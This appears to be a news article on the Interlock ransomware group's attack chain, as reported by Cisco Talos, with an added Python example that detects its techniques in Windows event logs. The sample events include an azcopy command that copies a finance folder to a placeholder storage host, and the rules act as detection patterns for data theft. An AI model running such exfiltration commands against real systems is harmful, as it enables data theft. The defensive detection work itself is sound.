A new ransomware group called Interlock has been observed by threat analysts conducting targeted attacks across sectors including US healthcare, IT and government and European manufacturing.
According to a report published by Cisco Talos today, Interlock employs both “big-game hunting” and double extortion tactics: data is stolen before encryption, and the group threatens to publish it unless a ransom is paid.
The group operates a data leak site known as the “Worldwide Secrets Blog” to publish stolen data, and offers victims support through chat options, showcasing a methodical approach to exploiting weaknesses in organizations’ cybersecurity.
Cisco Talos identified that Interlock’s attack chain generally spans around 17 days, during which they gain unauthorized access and deploy ransomware to encrypt files.
How Interlock Executes its Ransomware Attacks
Initial access often comes through a fake Google Chrome browser updater that installs a remote access tool (RAT) disguised as a legitimate update. This RAT, upon execution, collects detailed system information, establishes a secure connection to a command-and-control (C2) server and transmits encrypted data.
Notably, this RAT also installs a credential-stealing component, allowing Interlock to capture login details for online accounts. Interlock’s arsenal extends beyond simple data collection. The group effectively evades detection by disabling Endpoint Detection and Response (EDR) and clearing event logs.
Lateral movement is achieved via Remote Desktop Protocol (RDP) and other remote access tools, suggesting Interlock has developed tactics for reaching different systems within a network, potentially including Linux hosts.
The encryption stage employs both Windows and Linux variants of the Interlock ransomware, and both versions rely on a cryptographic library called LibTomCrypt.
The encryptor skips critical system folders and specific file extensions to avoid destabilizing the host. The Windows variant encrypts files using Cipher Block Chaining (CBC) mode, while the Linux variant may use CBC or RSA encryption.
The Connection Between Interlock and Rhysida Ransomware Groups
Talos’ analysis also noted a potential connection between Interlock and Rhysida ransomware groups, citing overlapping attack techniques, tools and even code. Both groups, for example, use the AzCopy tool to transfer stolen data to remote storage and deploy ransom notes with similar themes, presenting themselves as “helpful” breach informants rather than overt threats.
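Several of the behaviours described above (the fake Chrome updater dropped in a user-writable directory, event log clearing, RDP lateral movement, and AzCopy being used to move data out) leave traces in ordinary Windows event telemetry. The following is an added example, not code or data from Talos or from the article, showing how a defender might correlate those traces per host. The event IDs are standard Windows ones (4688 process creation, 4624 logon with type 10 for RDP, 1102/104 for a cleared Security/System log); the event record shape, the sample events and the "updater launched from Temp or Downloads" heuristic are constructed assumptions for illustration.

```python
"""Correlate Interlock-style TTPs over constructed Windows-event-like records.

Added example for illustration; the WinEvent shape, SAMPLE_EVENTS and the
updater-path heuristic are assumptions, not real telemetry or Talos's tooling.
"""
from collections import defaultdict
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class WinEvent:
    """Minimal stand-in for a Windows event record (constructed shape)."""
    host: str
    event_id: int
    user: str = ""
    image: str = ""       # NewProcessName for 4688
    cmdline: str = ""     # process command line for 4688
    logon_type: int = 0   # LogonType for 4624


def _image_name(ev: WinEvent) -> str:
    return PureWindowsPath(ev.image).name.lower() if ev.image else ""


def is_fake_chrome_updater(ev: WinEvent) -> bool:
    # Heuristic (assumption): a Chrome "update" binary launched from a
    # user-writable temp/download path rather than Chrome's install directory.
    if ev.event_id != 4688:
        return False
    name, path = _image_name(ev), ev.image.lower()
    return ("chrome" in name and "update" in name
            and any(p in path for p in ("\\appdata\\local\\temp\\", "\\downloads\\")))


def is_log_clear(ev: WinEvent) -> bool:
    # 1102 = Security audit log cleared, 104 = System log cleared
    return ev.event_id in (1102, 104)


def is_rdp_logon(ev: WinEvent) -> bool:
    # 4624 with LogonType 10 = RemoteInteractive, i.e. an RDP session
    return ev.event_id == 4624 and ev.logon_type == 10


def is_azcopy_transfer(ev: WinEvent) -> bool:
    # azcopy.exe performing a copy is legitimate in some estates; treat it as a
    # signal to correlate, not a verdict on its own.
    return (ev.event_id == 4688 and _image_name(ev) == "azcopy.exe"
            and "copy" in ev.cmdline.lower())


RULES = {
    "fake_chrome_updater": is_fake_chrome_updater,
    "event_log_cleared": is_log_clear,
    "rdp_remote_logon": is_rdp_logon,
    "azcopy_transfer": is_azcopy_transfer,
}


def detect(events) -> dict[str, list[str]]:
    """Return, per host, the sorted list of distinct TTP names observed."""
    hits: dict[str, set[str]] = defaultdict(set)
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[ev.host].add(name)
    return {host: sorted(ttps) for host, ttps in hits.items()}


def suspected_hosts(events, min_ttps: int = 3) -> list[str]:
    """Hosts on which at least min_ttps distinct TTPs co-occur."""
    return sorted(h for h, ttps in detect(events).items() if len(ttps) >= min_ttps)


# Constructed sample events (not real telemetry); the SAS URL is a placeholder.
SAMPLE_EVENTS = [
    WinEvent("WS01", 4688, "alice", r"C:\Users\alice\AppData\Local\Temp\ChromeUpdate.exe",
             r"C:\Users\alice\AppData\Local\Temp\ChromeUpdate.exe /silent"),
    WinEvent("WS01", 4688, "alice", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
             "chrome.exe --restore-last-session"),  # benign: real Chrome
    WinEvent("WS01", 1102, "alice"),
    WinEvent("SRV01", 4624, "alice", logon_type=10),
    WinEvent("SRV01", 4688, "alice", r"C:\Users\alice\Downloads\azcopy.exe",
             'azcopy.exe copy "D:\\Finance" "https://storage.example.invalid/c?sas=PLACEHOLDER" --recursive'),
    WinEvent("SRV01", 104, "alice"),
    WinEvent("WS02", 4624, "bob", logon_type=2),   # benign interactive logon
    WinEvent("WS02", 4688, "bob", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
             "chrome.exe"),
]

if __name__ == "__main__":
    for host, ttps in detect(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(ttps)}")
    print("suspected:", suspected_hosts(SAMPLE_EVENTS))
```

Each rule on its own produces noise (RDP logons and AzCopy runs are routine in many environments), which is why the example scores hosts on how many distinct signals co-occur rather than alerting on any single one; in a real deployment the threshold, the path heuristic and the rule set would be tuned against the organisation's own baseline.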
This trend toward operational diversification and collaboration across ransomware groups reflects broader patterns in the cyber threat landscape, where threat actors increasingly share resources to advance their capabilities.